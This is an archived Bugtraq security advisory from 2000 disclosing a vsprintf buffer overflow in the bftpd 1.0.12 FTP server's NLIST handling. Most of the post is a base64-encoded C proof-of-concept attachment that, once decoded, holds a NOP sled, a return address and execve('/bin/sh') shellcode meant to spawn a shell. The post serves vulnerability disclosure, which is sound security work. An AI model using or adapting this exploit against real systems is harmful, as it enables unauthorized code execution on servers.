Date: Wed, 6 Dec 2000 19:11:58 +0100 From: asynchro <asynchro@PKCREW.ORG> Subject: Malformed vsprintf in bftpd To: BUGTRAQ@SECURITYFOCUS.COM This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --8323328-908163786-976126318=:695 Content-Type: TEXT/PLAIN; charset=US-ASCII There is a malformed vsprintf in bftpd 1.0.12 in function sendstrf: int sendstrf(int s, char *format, ...) { .... vsprintf(buffer, format, val); when the function is called from NLIST command: else foo = 1; sendstrf(s, entry->d_name); } This can be used to overflow the buffer of the vsprintf and execute arbitrary code. I don't think it can be normally used for a remote attack because bftpd removes all non-printable characters from input strings and so it is not possible to remotely put a shellcode in a filename. A dimostrative code is attached. asynchro@pkcrew.org www.pkcrew.org --8323328-908163786-976126318=:695 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="bf-code.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.20.0012061911580.695@localhost.localdomain> Content-Description: Content-Disposition: attachment; filename="bf-code.c" LyoNCkNyZWF0ZXMgYSBmaWxuYW1lIHRvIGV4cGxvaXQgdGhlIGJ1ZyBpbiBi ZnRwZCAxLjAuMTINCkNyZWF0ZSB0aGUgZmlsZSwgY3dkIGluIHRoZSBzaGVs bCBkaXJlY3RvcnkgYW5kIG5saXN0IHRoZSBmaWxlIGRpcmVjdG9yeQ0KKHNo IGlzIGV4ZWN1dGVkIGluIHRoZSB3b3JraW5nIGRpciBiZWNhdXNlIGl0IGlz IG5vdCBwb3NzaWJsZSB0byBpbnNlcnQgYSAvIGluDQp0aGUgZmlsZW5hbWUp DQoNCmhpbnRzIGJ5IHxDeVJhWHwgJiBDdGh1bGh1DQpjb2RlZCBieSBhc3lu Y2hybw0KDQp3d3cucGtjcmV3Lm9yZw0KKi8NCg0KI2luY2x1ZGUgPHN0ZGxp Yi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KDQojZGVmaW5lIEJVRlNJWkUg NTEyDQojZGVmaW5lIE5PUCAxMjQNCg0KbWFpbigpDQp7DQppbnQgaTsNCmNo YXIgKmJ1ZmY7DQpjaGFyIG5vcD0weDkwOw0KY2hhciBhZGRyW109Ilx4ZDRc eGY5XHhmZlx4YmYiOw0KY2hhciBjb21tYW5kW109InRvdWNoICUuMjYweCI7 DQpjaGFyIHNoZWxsY29kZVtdPQ0KDQoiXHhlYlx4MWZceDVlXHg4OVx4NzZc eDA4XHgzMVx4YzBceDg4XHg0Nlx4MDdceDg5XHg0Nlx4MGNceGIwXHgwYiIN CiJceDg5XHhmM1x4OGRceDRlXHgwOFx4OGRceDU2XHgwY1x4Y2RceDgwXHgz MVx4ZGJceDg5XHhkOFx4NDBceGNkIg0KIlx4ODBceGU4XHhkY1x4ZmZceGZm XHhmZnNoIjsNCg0KDQpidWZmPShjaGFyICopIG1hbGxvYyhCVUZTSVpFKTsN Cm1lbXNldChidWZmLDB4MCxCVUZTSVpFKTsNCm1lbWNweShidWZmLGNvbW1h bmQsc2l6ZW9mKGNvbW1hbmQpKTsNCg0Kc3RybmNhdChidWZmLGFkZHIsNCk7 DQpzdHJuY2F0KGJ1ZmYsYWRkciw0KTsNCg0KZm9yKGk9MDsgaSA8IE5PUCA7 aSsrKQ0Kew0Kc3RybmNhdChidWZmLCZub3AsMSk7DQp9DQoNCnN0cm5jYXQo YnVmZixzaGVsbGNvZGUsc3RybGVuKHNoZWxsY29kZSkpOw0Kc3lzdGVtKGJ1 ZmYpOw0KfQ0K --8323328-908163786-976126318=:695--